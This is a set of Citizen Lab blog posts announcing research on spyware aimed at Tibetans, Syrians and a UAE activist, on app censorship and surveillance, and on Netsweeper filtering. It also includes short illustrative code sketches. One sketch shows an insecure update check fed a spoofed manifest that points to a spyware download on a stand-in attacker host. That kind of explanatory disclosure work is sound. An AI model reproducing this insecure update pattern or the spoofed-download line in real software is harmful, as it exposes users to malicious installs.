Just Enough to Do the Job: Targeted Attacks on Tibetans

I am pleased to announce a new Citizen Lab report, entitled “It’s Parliamentary: KeyBoy and the targeting of the Tibetan Community.” The report is authored by the Citizen Lab’s Adam Hulcoop, Etienne Maynier, John Scott-Railton, Masashi Crete-Nishihata, and Matt Brooks and can be found here: https://citizenlab.org/2016/11/parliament-keyboy/

In this report, the authors track a malware operation targeting members of the Tibetan Parliament between August and October 2016. The operation involved highly targeted email lures with repurposed content and attachments that contained an updated version of a custom backdoor known as “KeyBoy.”

There are several noteworthy parts of this report:

First, this operation is another example of a threat actor using “just enough” technical sophistication to exploit a target. Significant resources go into a targeted espionage operation, from the crafting of an exploit, to its packaging and delivery to the intended target, to the command and control infrastructure, and more. From the perspective of an operator, why risk burning these precious resources when something less sophisticated will do? Throughout the many years we have been studying targeted digital attacks on the Tibetan community, we have seen operators using the same old patched exploits because … well, they work.

Part of the reason these attacks work is that the communities in question typically do not have the resources or capabilities to protect their networks properly. While the Tibetan diaspora has done a remarkable job educating their community about how to recognize a suspicious email or attachment and not open it (their Detach from Attachments campaign being one example), many community members still rely on unpatched operating systems and lack adequate digital security controls. As Citizen Lab’s Adam Hulcoop remarked, “We found it striking that the operators made only the bare minimum technical changes to avoid antivirus detection, while sticking with ‘old day’ exploits that would not work on a patched and updated system.”

What goes for Tibetans holds true across the entire civil society space: NGOs are typically small, overstretched organizations; most have few resources to dedicate to doing digital security well. As a consequence, operators of targeted espionage campaigns can hold their big weapons in reserve and put more of their effort into crafting enticing messages — into the social engineering part of the equation — while repurposing older exploits like KeyBoy. As Citizen Lab senior researcher John Scott-Railton notes in a recent article, “Citizen Lab research has consistently found that although the overall technical sophistication of attacks is typically low, their social engineering sophistication is much higher.” The reason is that civil society is “chronically under-resourced, often relying on unmanaged networks and endpoints, combined with extensive use of popular online platforms….[providing] a target-rich environment for attackers.”

The second noteworthy part of the report concerns the precision of the social engineering on the part of the operators. The attacks were remarkably well timed to maximize their impact on victims. Just 15 hours after members of the Tibetan Parliament received an email about an upcoming conference, they received another email with the same subject and attachment, this time crafted to exploit a vulnerability in Microsoft Office and install KeyBoy. This level of targeting, and the re-use of a legitimate document sent only hours before, shows how closely the Tibetans are watched by their adversaries, and how much effort the operators of such attacks put into the social engineering side of a targeted attack. With such persistence and craftiness on the part of threat operators, it is no wonder civil society groups are facing an epidemic of this type of campaign.

Finally, the report demonstrates the value of trusted partnerships with targeted communities.  The Citizen Lab has worked with Tibetan communities for nearly a decade, and during that time we have learned a great deal from each other.  That they are willing to share samples of attacks like these with our researchers shows not only their determination to better protect themselves, but a recognition of the value of careful evidence-based research for their community.  By publishing this report, we hope that civil society, human rights defenders, and their sponsors and supporters can better understand the threat environment, and take steps to protect themselves.  

To that end, alongside the report, we are publishing extensive details and indicators of compromise in several appendices to the report, and hope other researchers will continue where we left off.

Read the report here: https://citizenlab.org/2016/11/parliament-keyboy/

What Lies Beneath China’s Live-Streaming Apps?

Today, the Citizen Lab is releasing a new report, entitled: “Harmonized Histories? A year of fragmented censorship across Chinese live streaming platforms.”  The report is part of our NetAlert series, and can be found here.

Live-streaming media apps are extraordinarily popular in mainland China, used by millions. Similar in functionality to the US-based, Twitter-owned streaming media app Periscope (which is banned in China), China-based apps like YY, 9158, and Sina Show have become a major Internet craze. Users of these apps share everything from karaoke and live poker matches to pop culture commentary and voyeuristic peeks into their private lives. For example, Zhou Xiaohu, a 30-year-old construction worker from Inner Mongolia, films himself eating dinner and watching TV, while another live-streamer earns thousands of yuan taking viewers on tours of Japan’s red-light districts.

The apps are also big business opportunities, for both users and the companies that operate them.  Popular streamers receive virtual gifts from their fans, who can number in the hundreds of thousands for some of the most widely viewed. The streamers can exchange these virtual gifts for cash.  Some of them have become millionaires as a result. The platforms themselves are also highly lucrative, attracting venture capital and advertisement revenues.

Chinese authorities have taken notice of the exploding live-streaming universe, which is not surprising considering their strict controls over free expression. Streams occasionally veer into taboo topics, such as politics or pornography, which has brought greater scrutiny, fines, takedowns, and increased censorship.

To better understand how censorship on the platforms takes place, our researchers downloaded three of the most popular applications (YY, 9158, and Sina Show) and systematically reverse engineered them.   Doing so allowed us to extract the banned keywords hidden in the clients as they are regularly updated.  Between February 2015 and October 2016, we collected 19,464 unique keywords that triggered censorship on the chats associated with each application, which we then translated, analyzed, and categorized.
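The mechanism we extracted — a list of banned keywords shipped inside the client and checked against each chat message — can be sketched roughly as follows. This is an illustrative reconstruction; the keywords, function names, and blocking behaviour below are hypothetical stand-ins, not the actual lists or logic extracted from YY, 9158, or Sina Show:

```python
# Illustrative sketch of client-side keyword censorship as described above.
# The keyword list and matching behaviour are hypothetical placeholders,
# NOT the actual lists extracted from the live-streaming apps.

BANNED_KEYWORDS = ["example banned phrase", "another trigger"]

def is_censored(message: str) -> bool:
    """Return True if the message contains any banned keyword."""
    return any(kw in message for kw in BANNED_KEYWORDS)

def send_chat(message: str) -> str:
    # A censoring client silently blocks the message before it is sent.
    if is_censored(message):
        return "blocked"
    return "sent"
```

Because the list lives in the client, updating the app updates the censorship rules — which is what allowed us to track changes to the lists over time.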

What we found is interesting for several reasons, and runs counter to claims put forth in a widely-read study on China’s Internet censorship system authored by Gary King et al. and published in the American Political Science Review. In that study, King and his colleagues conclude that China’s censors are not concerned with “posts with negative, even vitriolic, criticism of the state, its leaders, and its policies” and instead focus predominantly on “curtailing collective action by silencing comments that represent, reinforce, or spur social mobilization, regardless of content.” Their analysis gives the impression of a centralized and monolithic censorship system to which all Internet providers and companies strictly conform.

We found, on the other hand, that there is significant variation in blocking across the platforms.  This variation means that while the Chinese authorities may set general expectations of taboo or controversial topics to be avoided, what, exactly, to filter is left to the discretion of the companies themselves to implement.

We also found, contrary to King et al., that content they suggested was tolerated was in fact routinely censored by the live-streaming companies, albeit in inconsistent ways across the platforms. We also found many keywords targeted for filtering that had nothing to do with political directives, including censorship by live-streaming applications of posts related to their business competitors.

In other words, our research shows that the social media ecosystem in China — though definitely restricted for users — is more decentralized, variable, and chaotic than what King and his colleagues claim. It confirms the role of intermediary liability in China that Rebecca MacKinnon has put forward, known as “self-discipline,” whereby companies are expected to police themselves and their users to ensure a “harmonious and healthy Internet.” Ironically, that self-discipline often results in entirely different implementations of censorship on individual platforms, and a less than “harmonious” Internet experience as a result.

Our reverse engineering also discovered that YY — the most popular of the live-streaming apps, with over 844 million registered users — undertakes surveillance of users’ chats. When a user enters a censored keyword, a message is sent back to YY’s servers that includes the username of who sent the message, the username of who received it, the keyword that triggered censorship, and the entire triggering message. Nearly a billion unwitting users’ chats are subject to hidden keyword surveillance! Recall that in China companies are required to share user information with security agencies upon request, and Chinese citizens have been arrested based entirely on their online actions. Recently, for example, one user posted an image of a police report showing a person under investigation for downloading a VPN on his or her mobile phone.
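Based on our description of YY’s behaviour, the surveillance report sent back to the server carries four pieces of information. A hypothetical rendering of such a payload might look like the following — the field names and JSON framing are ours for illustration, not YY’s actual wire format:

```python
import json

def build_surveillance_report(sender, recipient, keyword, message):
    """Hypothetical reconstruction of the kind of report described above:
    who sent the message, who received it, the triggering keyword, and
    the full message text. Field names are illustrative, not YY's."""
    return json.dumps({
        "from_user": sender,
        "to_user": recipient,
        "trigger_keyword": keyword,
        "full_message": message,
    })

report = build_surveillance_report("alice", "bob", "vpn", "how do I get a vpn?")
```

The key point is that the full message and both usernames leave the device — far more than is needed simply to block the message client-side.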

On a more technical level, our research shows the value of careful reverse engineering for revealing information controls hidden from the view of the typical user.  The keyword lists we extracted and are publishing reveal exactly what content triggers censorship and surveillance, something that is known only to the decision makers within the companies themselves.  We see this type of research as critical to informing users of the ecosystem within which they communicate.

Sometimes what we find also runs counter to conventional wisdom. You don’t know what’s being censored if you can’t see the list of banned keywords. Opening these applications up allows us to see them from the inside out, giving a direct view of what is filtered that other, more impressionistic scans can only infer.

What an “MRI of the Internet” Can Reveal: Netsweeper in Bahrain

I am pleased to announce a new Citizen Lab report: “Tender Confirmed, Rights At Risk: Verifying Netsweeper in Bahrain.”  The full report can be found here: https://citizenlab.org/2016/09/tender-confirmed-rights-risk-verifying-netsweeper-bahrain

Internet censorship is a major and growing human rights issue today. Access to content is restricted for users on social media, like Facebook, on mobile applications, and on search engines.  The most egregious form of censorship, however, is that which occurs at a national level for entire populations.  This type of censorship has been spreading for many years, and now has become normalized across numerous countries.

One of the Citizen Lab’s longest-standing research activities is the meticulous documentation of Internet censorship. We were one of the founding partners of the OpenNet Initiative, which at one time documented Internet filtering and surveillance in more than 70 countries on an annual basis. We continue this research in the form of country case studies or analyses of information controls around specific events, like a civil war.

At the core of this research is a mixture of technical interrogation and network measurement methods, including in-country testing, remote scans of national networks, database queries, and large-area scans of the entire Internet. One of the tools we use is the scanner ZMap, which we run on high-speed computers to perform a complete scan of the entire Internet address space in a matter of minutes. Think of this technique as an MRI of the Internet.

A byproduct of these scans is the ability to identify equipment that is used to undertake Internet censorship and surveillance. Certain filtering systems have the equivalent of digital signatures which we use when scanning the Internet. Searching for these signatures allows us to locate installations around the world. Doing so is useful in and of itself to help shed light on what’s going on beneath the surface of the Internet. But it is also useful for raising awareness about the companies that are complicit in Internet censorship practices.
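The signature-matching step can be sketched as follows: after an internet-wide scan collects, say, the HTTP responses returned by each host, we search those responses for strings characteristic of a known filtering product. The signature and banners below are made-up placeholders for illustration, not actual Netsweeper fingerprints:

```python
# Sketch of matching scan results against product signatures.
# The product name, signature string, and banners are placeholders,
# NOT real fingerprints of any filtering vendor.

SIGNATURES = {
    "ExampleFilter": ["X-Filter-Product: ExampleFilter"],
}

def identify(banner):
    """Return the product whose signature appears in the banner, else None."""
    for product, sigs in SIGNATURES.items():
        if any(sig in banner for sig in sigs):
            return product
    return None

# Hypothetical scan output: IP address -> raw HTTP response.
scan_results = {
    "203.0.113.5": "HTTP/1.1 403 Forbidden\r\nX-Filter-Product: ExampleFilter\r\n",
    "198.51.100.7": "HTTP/1.1 200 OK\r\nServer: nginx\r\n",
}
hits = {ip: identify(b) for ip, b in scan_results.items() if identify(b)}
```

Geolocating the matched IP addresses to specific ISPs is what then lets us say which networks, in which countries, are running a given product.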

One of the companies that we have identified in this way is Netsweeper Inc., a Canadian company based in Waterloo, Ontario. We have identified Netsweeper installations being used to filter at the national level in Pakistan, Somalia, and Yemen, among other countries. Our latest report, published today, locates live Netsweeper installations on nine ISPs in the Kingdom of Bahrain.

These findings are significant for several reasons. Bahrain has one of the world’s worst records on human rights, particularly press and Internet freedoms. For many years, Bahrain has restricted access to Internet content having to do with independent media, websites critical of the Kingdom, and content related to the Shia faith, which is heavily persecuted in Bahrain.

In January 2016, Bahrain issued a tender for bidding on a national-level Internet filtering system. Our findings are significant because we can confirm the presence of Netsweeper installations on Bahraini ISPs following the bid.

These findings are also noteworthy because Netsweeper filed, and then discontinued, a $3.5 million defamation suit against me and the University of Toronto following our prior report on Netsweeper in Yemen. Our report published today is the first since the defamation suit was discontinued by Netsweeper. As we have done with prior reports, we sent Netsweeper a letter, which can be found here, in which we lay out our findings, ask Netsweeper questions about their due diligence and corporate social responsibility policies, and offer to publish their response in full alongside our report. As of today, Netsweeper has not replied to that letter.

Lastly, the case is significant because Netsweeper is a Canadian company, and the Internet filtering services it provides to a country like Bahrain — though not in violation of any Canadian law per se — are definitely being used to suppress content deemed legitimate expression under international human rights law, which Canada explicitly supports. All the more troubling, then, is the fact that Netsweeper has benefited, and will benefit in the future, from tangible support provided by both the Canadian and the Ontario governments at trade shows held in the Gulf region. Canada’s Trade Commissioner says the government’s involvement at these trade shows includes assistance with “business-to-business meetings” and “networking events” as well as provision of a “pavilion/exhibit” — all of which is “offered free of charge to Canadian companies and organizations.” While we have no evidence Canada went so far as to facilitate Netsweeper’s specific bid on Bahrain’s tender, the government certainly did use Canadian taxpayer dollars to represent Netsweeper to interested clients in the region.

Should the government of Canada be promoting a company whose software is used to violate human rights and which offers services in direct contradiction to our stated foreign policy goals on cyberspace?   Perhaps a more harmonized approach would be to require companies like Netsweeper to have some explicit corporate social responsibility process in place.  Export controls could be established that restrict the sale of technology and services to countries that will use their product to infringe internationally-recognized human rights.  Taking these steps would help better synchronize Canada’s economic and human rights policies while also bringing the world of Internet filtering in line with widely recognized principles on how businesses should respect human rights.

Disarming a Cyber Mercenary, Patching Apple Zero Days

I am pleased to announce a new Citizen Lab report: “The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender,” authored by senior researchers Bill Marczak and John Scott-Railton.

If you are one of the hundreds of millions of people who own an iPhone, today you will receive a critical security patch. While updating your software, you should pause for a moment to thank human rights activist Ahmed Mansoor.

Mansoor is a citizen of the United Arab Emirates, and because he’s a human rights activist in an autocratic country his government views him as a menace.  For security researchers at the Citizen Lab, on the other hand, Mansoor’s unfortunate experiences are the gift that won’t stop giving.

Mansoor is an outspoken defender of human rights, civil liberties, and free expression in a country that routinely flouts them all. While he has been praised internationally for his efforts — in 2015, Mansoor was given the prestigious Martin Ennals Award for Human Rights Defenders — his government has responded with imprisonment, beatings, harassment, a travel ban…and persistent attempts to surreptitiously spy on his digital communications.

For example, in 2011 Mansoor was sent a PDF attachment loaded with sophisticated spyware manufactured by the British/German company Gamma Group. Fortunately, he decided not to open it.

In 2012, he was targeted with more spyware, this time manufactured by an Italian company, Hacking Team.  His decision to share that sample with Citizen Lab researchers led to one of our first detailed reports on the commercial spyware trade.

And so earlier this month, when Mansoor received two unsolicited SMS messages on his iPhone 6 containing links about “secrets” concerning detainees in UAE prisons, he thought twice about clicking on them.  Instead, he forwarded them to us for analysis. It was a wise move. 

Citizen Lab researchers, working in collaboration with the security company Lookout, found that lurking behind those SMS messages was a series of “zero day” exploits (which we call “The Trident”) designed to take advantage of unpatched vulnerabilities in Mansoor’s iPhone. 

To say these exploits are rare is truly an understatement. Apple is widely renowned for its security — just ask the FBI. Exploits of its operating system sell on the order of hundreds of thousands of dollars each. One company that resells zero days paid $1 million for a single iOS exploit, while the FBI reportedly paid at least $1.3 million for the exploit used to get inside the San Bernardino device. The attack on Mansoor employed not one but three separate zero-day exploits.

Had he followed those links, Mansoor’s iPhone would have been turned into a sophisticated bugging device controlled by UAE security agencies. They would have been able to turn on his iPhone’s camera and microphone to record Mansoor and anything nearby, without him being any the wiser. They would have been able to log his emails and calls — even those that are encrypted end-to-end. And, of course, they would have been able to track his precise whereabouts.

Through careful, detailed network analysis, our team (led by Bill Marczak and John Scott-Railton) was able to positively link the infrastructure behind these exploits to an obscure company called “NSO Group”.

Don’t look for them online; NSO Group doesn’t have a website. It is an Israel-based “cyber war” company owned by an American venture capital firm, Francisco Partners Management, and founded by alumni of the infamous Israeli signals intelligence agency, Unit 8200. That unit is among the most highly regarded state agencies for cyber espionage, and is allegedly responsible (along with the U.S. NSA) for the so-called “Stuxnet” cyber attack on Iran’s nuclear enrichment facilities.

In short: we uncovered an operation seemingly undertaken by the United Arab Emirates using the services and technologies of an Israeli “cyber war” company, which used precious and very expensive zero-day iOS exploits to get inside an internationally renowned human rights defender’s iPhone.

That’s right: Not a terrorist. Not ISIL. A human rights defender.

(An important aside: we also were able to identify what we suspect are at least two other NSO Group-related targeted digital attack campaigns: one involving an investigative journalist in Mexico, and the other a tweet related to an opposition politician in Kenya).

Once we realized what we had uncovered, Citizen Lab and Lookout contacted Apple with a responsible disclosure concerning the zero days.   

Our full report is here.

Apple responded immediately, and we are releasing our report to coincide with their public release of the iOS 9.3.5 patch.

That a country would expend millions of dollars, and contract with one of the world’s most sophisticated cyber warfare units, to get inside the device of a single human rights defender is a shocking illustration of the serious nature of the problems affecting civil society in cyberspace.  This report should serve as a wake-up call that the silent epidemic of targeted digital attacks against civil society is a very real and escalating crisis of democracy and human rights.

What is to be done? Clearly there is a major continuing problem with autocratic regimes abusing advanced interception technology to target largely defenceless civil society organizations and human rights defenders. The one solution that has been proposed by some — export controls on items related to “intrusion software” — appears to have had no effect in curbing abuses. In fact, Israel has export controls in place ostensibly to prevent this very sort of abuse from happening. But something obviously slipped through the cracks…

Maybe it is time to explore a different strategy — one that holds companies directly responsible for the abuse of their technologies. It is interesting in this respect that NSO Group disguised some of its infrastructure as government, business, and civil society websites, including those of the International Committee of the Red Cross, Federal Express, YouTube, and Google Play.

Isn’t that fraud against the user? Or a trademark violation? If not considered so now, maybe it should be.

Meanwhile, please update your iPhone’s operating system, and while you’re doing it, spare a thought for Ahmed Mansoor.

All iPhone owners should update to the latest version of iOS immediately. If you’re unsure what version you’re running, you can check Settings > General > About > Version.

Communicating Privacy and Security Research: A Tough Nut to Crack

Today at the Citizen Lab we released a new report on (yet more) privacy and security issues in UC Browser, accompanied by a new cartoon series, called Net Alert.

Our new UC Browser report, entitled “A Tough Nut to Crack” and authored by Jeffrey Knockel, Adam Senft, and me, is our second close-up examination of UC Browser, by some estimates the second most popular mobile browser application in the world. In our first analysis of UC Browser, undertaken in 2015, we discovered several major privacy and security vulnerabilities that would seriously expose users of UC Browser to surveillance and other privacy violations. We were tipped off to look at UC Browser while going through some of the Edward Snowden disclosures, in which we discovered the NSA, CSE, and other SIGINT partners patting themselves on the back for exploiting data leaks and faulty update security in UC Browser. I wrote an op-ed at the time discussing the security tradeoffs involved in keeping knowledge of software flaws like this quiet, and how we need a broader public discussion about software vulnerability disclosures.

We decided to take a second look at UC Browser, this time led by Jeffrey Knockel. By reverse engineering several versions of UC Browser, Jeffrey was able to determine the likely version number referenced in the Snowden disclosure slides, which led the NSA to develop an XKeyscore plugin for UC Browser exploitation. We also found that all versions of the browser we examined — Windows and Android — transmit personal user data with easily decryptable encryption, and that the Windows version does not properly secure its software update process, leaving it vulnerable to arbitrary code execution. We disclosed our findings to Alibaba, the parent company, and report back on their responses and fixes, such as they are, in an appendix to the report.
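“Easily decryptable encryption” typically means a scheme whose key ships inside the client itself, so anyone who reverse engineers the app can recover the key and decrypt the traffic. A minimal illustration of the general problem — using a hardcoded-key XOR cipher as a stand-in, which is not UC Browser’s actual algorithm:

```python
# Illustration of why a key hardcoded in an app defeats the purpose of
# encrypting its traffic. The XOR scheme below is a generic stand-in,
# NOT UC Browser's actual algorithm, and the sample data is made up.

HARDCODED_KEY = b"app-shipped-key"  # recoverable by anyone who unpacks the app

def xor_crypt(data: bytes, key: bytes = HARDCODED_KEY) -> bytes:
    """XOR each byte with the repeating key; applying it twice decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# The client "encrypts" personal data before sending it over the network...
ciphertext = xor_crypt(b"device_id=0123456789")
# ...but any observer holding the extracted key recovers the plaintext.
plaintext = xor_crypt(ciphertext)
```

This is exactly the kind of weakness a passive network observer — such as the SIGINT agencies named in the Snowden slides — can exploit at scale once the scheme has been reverse engineered once.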

Communicating these risks to users is not always easy, as the details are very technical and can be confusing.  To help better communicate privacy and security research to a broader audience,  we co-timed the release of our new UC Browser report with the first in a series of cartoons and info-nuggets on digital security, called “Net Alert.”   The first Net Alert features two informative and funny cartoons by Hong Kong artist Jason Li, each of which tells a story about the risks of using UC Browser.  The Net Alert series also includes background information on digital security topics, like the risks of “man-in-the-middle” attacks and of using open WiFi networks.   (Net Alert is produced by Citizen Lab in collaboration with Open Effect and the University of New Mexico).  We will be producing more of these Net Alert cartoons and info-nuggets co-timed with future Citizen Lab reports.  Our hope is that by communicating privacy and digital security risks in a friendly and accessible way, more people will be inclined to take small steps to better protect themselves against exposure and learn more about the research we undertake.

The UC Browser report is but one in an ongoing research series on mobile privacy and security. For those who are interested, we have also published a FOCI paper, which we are presenting this week at the 2016 USENIX Free and Open Communications on the Internet workshop, that summarizes our technical analysis of the security and privacy vulnerabilities in three web browsers developed by China’s three biggest web companies: UC Browser, QQ Browser, and Baidu Browser, developed by UCWeb (owned by Alibaba), Tencent, and Baidu, respectively.

The Iranian Connection

Today, the Citizen Lab is publishing a new report, authored by the Citizen Lab’s John Scott-Railton, Bahr Abdulrazzak, Adam Hulcoop, Matt Brooks, and Katie Kleemola of Lookout, entitled “Group 5: Syria and the Iran Connection.”

The full report is here: https://citizenlab.org/2016/08/group5-syria/

Associated Press has an exclusive report here: http://bigstory.ap.org/article/6ab1ab75e89e480a9d12befd3fea4115/experts-iranian-link-attempted-hack-syrian-dissident

And, I wrote an op-ed for the Washington Post about our report, which can be found here: https://www.washingtonpost.com/posteverything/wp/2016/08/02/how-foreign-governments-spy-using-email-and-powerpoint/

This report describes an elaborately staged malware operation with targets in the Syrian opposition. We first discovered the operation in late 2015 when a prominent member of the Syrian opposition, Noura Al-Ameera, spotted a suspicious e-mail containing a PowerPoint slideshow purporting to show evidence of “Assad crimes.”  Rather than open it, Al-Ameera wisely forwarded it to us at the Citizen Lab for further analysis.  Upon investigation, we determined the PowerPoint was laden with spyware.

Following that initial lead, our researchers spent several months engaged in careful network analysis, reverse engineering, and mapping of the command and control infrastructure.  Although we were not able to make a positive attribution to a single government (a common issue in cyber espionage investigations), we were able to determine that behind the targeted attack on Noura Al-Ameera is a new espionage group operating out of Iranian Internet space, possibly a privateer and likely working for either the Syrian or Iranian governments (or both).

Citizen Lab has tracked four separate malware groups that have targeted the Syrian opposition since the early days of the conflict: Assad regime-linked malware groups, the Syrian Electronic Army, ISIS, and a group with ties to Lebanon. Our latest report adds one more threat actor to the list, with ties to Iran, which we name “Group5” (to reflect the four other known groups).

The report demonstrates yet again that civil society groups are persistently targeted by digital malware campaigns, and that their reliance on shared social media and digital mobilization tools can be a source of serious vulnerability when exploited by operators using clever social engineering methods.

On Research in the Public Internet

This post is cross posted from https://citizenlab.org/2016/07/research-interest/

On January 20, 2016, Netsweeper Inc., a Canadian Internet filtering technology service provider, filed a defamation suit with the Ontario Superior Court of Justice. The University of Toronto and I were named as the defendants. The lawsuit pertained to an October 2015 report of the Citizen Lab, “Information Controls during Military Operations: The case of Yemen during the 2015 political and armed conflict,” and related comments to the media. Netsweeper sought $3,000,000.00 in general damages; $500,000.00 in aggravated damages; and an “unascertained” amount for “special damages.”

On April 25, 2016, Netsweeper discontinued its claim in its entirety.

Between January 20, 2016 and today, we chose not to speak publicly about the lawsuit. Instead, we spent time preparing our statement of defence and other aspects of what we anticipated would be full legal proceedings.

Now that the claim has been discontinued it is a good opportunity to take stock of what happened, and make some general observations about the experience.

It should be pointed out that this is not the first time a company has contemplated legal action regarding the work of the Citizen Lab. Based on emails posted to Wikileaks from a breach of the company servers, we know that the Italian spyware vendor, Hacking Team, communicated with a law firm to evaluate whether to “hit [Citizen Lab] hard.” However, it is the first time that a company has gone so far as to begin litigation proceedings. I suspect it will not be the last.

Fortunately, Ontario has recognized the importance of protecting and encouraging speech on matters of public interest. Canada has historically been a plaintiff-friendly environment for defamation cases, but on November 3, 2015, the legal landscape shifted in Ontario when a new law called the Protection of Public Participation Act (PPPA) came into force. It was specifically designed to guard against “strategic litigation against public participation,” or SLAPP suits. The Act enumerates its purposes as:

(a) to encourage individuals to express themselves on matters of public interest;

(b) to promote broad participation in debates on matters of public interest;

(c) to discourage the use of litigation as a means of unduly limiting expression on matters of public interest; and

(d) to reduce the risk that participation by the public in debates on matters of public interest will be hampered by fear of legal action.

Under the Act, a judge may dismiss a defamation proceeding if “the person satisfies the judge that the proceeding arises from an expression made by the person that relates to a matter of public interest.” The Act allows for recovery of costs, and if, “in dismissing a proceeding under this section, the judge finds that the responding party brought the proceeding in bad faith or for an improper purpose, the judge may award the moving party such damages as the judge considers appropriate.”

In our view, the work of Citizen Lab to carefully document practices of Internet censorship, surveillance, and targeted digital attacks is precisely the sort of activity recognized as meriting special protection under the PPPA. Had our proceedings gone forward, we intended to exercise our rights under the Act and move to dismiss Netsweeper’s action.

Regardless of the status of the suit, we strenuously disagree with the claims made by Netsweeper, and stand firm in the conviction that my remarks to the media, and the report itself, are both clearly responsible communications on matters of public interest and fair comment as defined by the law.

One point bears underscoring: it is an indisputable fact that Citizen Lab tried to obtain and report Netsweeper’s side of the story. Indeed, we have always welcomed company engagement with us and the public at large in frank dialogue about issues of business and human rights. We sent a letter by email directly to Netsweeper on October 9, 2015. In that letter we informed Netsweeper of our findings, and presented a list of questions. We noted: “We plan to publish a report reflecting our research on October 20, 2015. We would appreciate a response to this letter from your company as soon as possible, which we commit to publish in full alongside our research report.”

Netsweeper never replied.

We expect that Citizen Lab research will continue to generate strong reaction from companies and other stakeholders that are the focus of our reports. The best way we can mitigate legal and other risk is to continue to do what we are doing: careful, responsible, peer-reviewed, evidence-based research. We will continue to investigate Netsweeper and other companies implicated in Internet censorship and surveillance, and we will continue to give those companies a chance to respond to our findings, and publish their responses, alongside our reports.

I come away from this experience profoundly appreciative of the skills of my staff and colleagues, and in particular Jakub Dalek, Sarah McKune, and Adam Senft, who assisted in the legal preparations.

Lastly, I am grateful to the University of Toronto for their support throughout this process. With corporate involvement in academia seemingly everywhere these days, it is tempting to get cynical about universities, and wonder whether corporate pressures will make university administrators lose sight of their core mission and purpose. After the experiences of the last few months, I feel optimistic about the possibilities of speaking truth to power with the protection of academic freedom that the University of Toronto has provided me.

Meanwhile, back to work on another Citizen Lab report.

The Week of Holding “Big Data” Accountable

The world of “Big Data,” “The Internet of Things,” or simply… “Cyberspace.”

Whatever we choose to call it, never in human history has something so profoundly consequential for so many people’s daily lives been unleashed in such a short period of time.  Certainly, the printing press, the telegraph, radio, and television were all extraordinary.  But what is going on now is truly unprecedented in its sudden, dramatic impact.  In the span of a few short years, billions of citizens the world over are immersing themselves in an entirely new communications environment — one that is changing not only how we think and behave but, more profoundly, how society as a whole is fundamentally structured.  Information that previously was stored in our office drawers, in locked closets, in our diaries, even in our minds, we are now transmitting to thousands of private companies and, by extension, to government agencies.

This world of Big Data is a supernova of billions of human interactions, habits, movements, thoughts, and desires, ripe to be harvested, analyzed, and then fed back to us, in turn, to predict and shape us.  It should come as no surprise, given the rate at which this transformation is occurring, that there will be unintended — and possibly even seriously detrimental — consequences for privacy, liberty, and security.

Evidence of these consequences is now beginning to accumulate.  First, there are privacy issues. Data breaches that expose the email and password credentials of tens of millions of people have become so routine that researchers are now describing them as “megabreaches.” Our research at the Citizen Lab has shown how numerous popular mobile applications used by hundreds of millions of people routinely leak sensitive user information, including, in some cases, the geolocation of the user, device ID and serial number information, and lists of nearby wifi networks. We have discovered that some applications were so poorly secured that anyone with control of a network to which these applications connect (e.g., a WiFi hotspot) could easily spoof a software update to install spyware onto an unwitting user’s device.
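The insecure update pattern described above can be sketched in a few lines of Python. This is a hypothetical illustration only — the function, manifest format, version strings, and URLs are all invented, not taken from any application we examined:

```python
# Sketch of the insecure pattern: an app fetches an update manifest over
# plain, unauthenticated HTTP and trusts the advertised download URL with
# no signature check. Anyone controlling the network path (e.g., a WiFi
# hotspot) can rewrite the response and point the client at spyware.
# All names and URLs below are hypothetical.

import json

def choose_update(manifest_json, installed_version):
    """Return the download URL if the manifest advertises a newer version.

    Because the manifest is unauthenticated and the URL is trusted as-is,
    whoever controls the network controls what the client downloads.
    """
    manifest = json.loads(manifest_json)
    if manifest["version"] > installed_version:
        return manifest["url"]   # trusted blindly -- no signature verification
    return None

# What the legitimate server would send:
genuine = json.dumps({"version": "2.1", "url": "http://example.com/app-2.1.apk"})
# What a hostile hotspot operator could substitute:
spoofed = json.dumps({"version": "9.9", "url": "http://attacker.example/spyware.apk"})

print(choose_update(genuine, "2.0"))
print(choose_update(spoofed, "2.0"))  # the client fetches the attacker's file
```

The fix is equally simple to state: fetch manifests over authenticated TLS and verify a cryptographic signature on the update package before installing it.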

Poorly designed mobile applications, such as those we have examined, are a goldmine for criminals and spies, and yet we surround ourselves with them. Disclosures by former National Security Agency (NSA) contractor Edward Snowden have shown that state intelligence agencies routinely vacuum up information leaked by applications in this way, and use the data for mass surveillance.  And what they don’t acquire from leaky applications, they get directly from the companies through lawful requests.  The confluence of interests around commercial and state surveillance is where Big Data meets Big Brother.

Beyond privacy issues are those of security. For example, researchers have demonstrated how they could use remote WiFi connections to take over the controls of a smart car or even an airline’s cockpit systems.  Others have shown proof-of-concept attacks against “smart home” systems that remotely cracked door lock codes, disabled vacation mode, and induced a fake fire alarm. Of course, what happens in the lab is but an omen of what’s to come in the real world. Several years ago, a computer virus called “Stuxnet,” reportedly developed by the US and Israel, was used to sabotage Iranian nuclear enrichment plants.  Dozens of countries are reportedly researching and stockpiling their own Stuxnet-like cyber weapons, which in turn is generating a huge commercial market for the hidden software flaws these weapons exploit. Perversely adding to the insecurities (as the FBI-Apple controversy showed us), some government agencies are, in fact, pressuring companies to weaken their systems by design to aid law enforcement and intelligence agencies.  As such insecurities mount, and as more and more of our critical infrastructure is networked, the Big Data environment in which we live may turn out to be a digital house of cards.

This past week, the Citizen Lab and our partners, Open Effect, produced several outputs and organized activities relating to concerns around privacy and security in the world of Big Data, including some that we hope can help mitigate these unintended consequences.

First, the Citizen Lab and Open Effect released a revamped version of the Access My Info tool, which allows Canadians to exercise their legal rights to ask companies about the data they collect on them, what they do with it, and with whom they share it.  I wrote an op-ed for the CBC about the tool, and there were several other media reports, including an interview by the CBC’s Metro Morning host Matt Galloway with Andrew Hilts of Citizen Lab and Open Effect.

Also, yesterday the CBC Ideas broadcast a special radio show on “Big Data Meets Big Brother,” in which I participated alongside Ann Cavoukian and Neil Desai, with Munk School director Stephen Toope moderating.  We discussed the balance between national security and privacy, and focused on the limited oversight mechanisms that exist in Canada around security agencies, and especially the Communications Security Establishment (CSE).

Finally, Citizen Lab and Open Effect, as part of our Telecommunications Transparency Project, released a DIY Transparency Reporting Tool.  The tool is actually a software template that provides companies with a guide for developing transparency reports. To give some context for the tool, companies are increasingly encouraged to release public reports on the length of time client data is retained, how the data is used, and how often—and under what lawful authority—the data is shared with government agencies.  The DIY Transparency Reporting Tool is the flipside of the Access My Info project:  whereas the latter encourages consumers to ask companies and governments about what they do with our data, the Transparency Reporting Tool provides companies with an easy-to-use template to take the initiative to report that information to us.
